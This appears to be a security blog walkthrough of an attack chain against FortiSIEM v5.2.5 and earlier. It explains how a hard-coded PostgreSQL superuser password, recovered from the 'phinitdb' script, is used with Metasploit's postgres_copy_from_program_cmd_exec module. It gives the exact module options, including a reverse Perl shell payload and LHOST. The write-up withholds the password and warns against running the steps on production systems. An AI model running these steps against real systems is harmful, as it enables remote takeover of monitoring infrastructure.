Attack Chain Overview:
1) FortiSIEM uses multiple resources including PostgreSQL
2) Recent versions of PostgreSQL (v9.3+) have a cool feature that lets you run code remotely
3) You need to know a password for one of the database super users to use the ‘feature’
4) FortiSIEM uses a hard-coded password for it’s PostgreSQL DB super user in versions (v5.2.5) and earlier
5) Systems administrators tend to follow the guide book when configuring complex systems, especially systems that cost a lot of money, cannot be rebuilt easily, and that must remain online no matter what
6) User guides for FortiSIEM neglect changing default passwords in the installation steps
reSearch:
Let’s start with getting the hard-coded password. Rather than post the password for all to see, (mostly as a way to keep honest people honest) you can get the password by loading up any test FortiSIEM instance v5.2.5 or earlier.
1. Log in to your testing FortiSIEM instance via SSH. Then look at the ‘phinitdb’ script file:
There you’ll find the hard-coded PostgreSQL password that leads to the rest of the attack chain.
2. Load up (y)our favorite MSF console and search for ‘postgresql’
We’re going to use the ‘exploit/multi/postgres/postgres_copy_from_program_cmd_exec’ module.
Avoid performing this next bit on production systems unless you need to regain access to an instance of FortiSIEM that stopped responding to SSH.
3a. Set the options like so:
DATABASE: phoenixdb
USERNAME: phoenix
PASSWORD: <get from your test VM>
TABLENAME: ph_cmd_exec
PAYLOAD: cmd/unix/reverse_perl payload (default)
LHOST: <Your SIEM reachable IP>
3b. Exploit!